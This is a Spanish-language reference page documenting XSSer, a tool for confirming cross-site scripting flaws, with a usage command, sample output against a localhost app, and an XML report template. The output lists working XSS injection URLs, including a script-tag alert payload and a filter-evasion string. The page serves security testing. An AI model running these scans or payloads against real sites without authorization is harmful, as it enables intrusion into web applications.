Menu

XSSer-es




XSSer

Fase(s):

Principal: Explotación.
Secundaria: N/A.

Descripción:

Es una herramienta que ayuda a confirmar una vulnerabilidad Cross Site Script.

Objetivo:

  • Confirmar vulnerabilidades Cross Site Script en una aplicación Web.
  • Obtener el payload que explota la vulnerabilidad Cross Site Script.

Funcionalidades:

Tecnologías soportadas: Aplicaciones Web (HTTP/HTTPS).

Modo de ejecución: Activo.

Confirmar vulnerabilidades Cross Site Script.

  • Envía varios request HTTP con payload e informa si la prueba fue satisfactoria o no lo fue.

Reportes:
Resultados exportables:
Guarda los resultados en las siguientes formas:

  • Archivo en formato de texto plano.
  • En un reporte en formato XML, guarda un reporte por cada ejecución.

Uso básico:

Realizar la verificación de vulnerabilidades Cross Site Script. El siguiente comando envía un request HTTP con payload al aplicativo Web para confirmar la vulnerabilidad Cross Site Script.

./xsser -u [URL] -g ?txt002=asd&txt003=" --auto --save --xml=[Directorio]/reporteXmlXSSer.xml


Dónde:

  • -u. Es la página donde se identificó la vulnerabilidad Cross Site Script
  • -g. Los parámetros necesarios para realizar la petición HTTP, el parámetro vulnerable deberá ser el último seguido del signo ‘=’.
  • --auto. Prueba payloads autogenerados por la herramienta.
  • --save. Guarda el resultado de la prueba en el archivo, por defecto “XSSlist.dat”
  • --xml. Guarda el reporte de la prueba en un archivo con formato XML.

La herramienta inicia con una prueba con la que verifica la disponibilidad del aplicativo.

===========================================================================

XSSer v1.6 (beta): "Grey Swarm!" - 2011/2012 - (GPLv3.0) -> by psy

===========================================================================
Testing [XSS from URL] injections... looks like your target is good defined ;)
===========================================================================

HEAD alive check for the target:
(http://localhost/miaplicacion/viewTxtSecond.php) is OK(200) [AIMED]

===========================================================================
Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448
===========================================================================


Posteriormente, se muestran mensajes de estatus de la ejecución de la prueba, donde se indica el resultado de cada prueba realizada.


---------------------------------------------
[-] Hashing: 17b639ff5ed74979be28767fac3a3ccc
[+] Trying: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003=">17b639ff5ed74979be28767fac3a3ccc
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[+] Checking: url attack with ">PAYLOAD... ok

===========================================================================
Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448
===========================================================================

---------------------------------------------
[-] Hashing: 23f90e9384b1b1d14fac2219f4852b5a
[+] Trying: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003=">
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[+] Checking: url attack with ">... fail

===========================================================================
Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448


Por último, muestra estadísticas acerca de las pruebas realizadas y la lista de las pruebas satisfactorias.

===========================================================================

Mosquito(s) landed!

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 98
- Failed: 83
- Sucessfull: 15
- Accur: 15 %

===========================================================================
[*] List of possible XSS injections:
===========================================================================

[I] Target: http://localhost/miaplicacion/viewTxtSecond.php
[+] Injection: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003="><script>alert('54cb1f93151d601c24d761ecdf9b5 692')</script>
[-] Method: xss
[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
--------------------------------------------------

[I] Target: http://localhost/miaplicacion/viewTxtSecond.php
[+] Injection: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003='';!--"<63fc790dd14eec89b6eec7dca56230b1>=&{()}"
[-] Method: xss
[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
--------------------------------------------------


Ejemplo de reporte XML:

<report>
<header>
<title>XSSer Security Report: AAA-MM-DD hh:mm:ss.xxxx</title>
</header>
<abstract>
<injections>
<total>TOTAL</total>
<failed>FAILED</failed>
<successful>SUCCESSSFUL</successful>
<accur>%</accur>
</injections>
</abstract>
<results>
<attack>
<injection>URL_WITH_INJECTION</injection>
<browsers>BROWSER_SUPPORT</browsers>
<method>METHOD</method>
</attack>

</results>
</report>


Referencias:

Liga: http://xsser.sourceforge.net/
Autor (es): psy (epsylon)
Contacto: root [at] lordepsylon.net
Licencia: GNU GENERAL PUBLIC LICENSE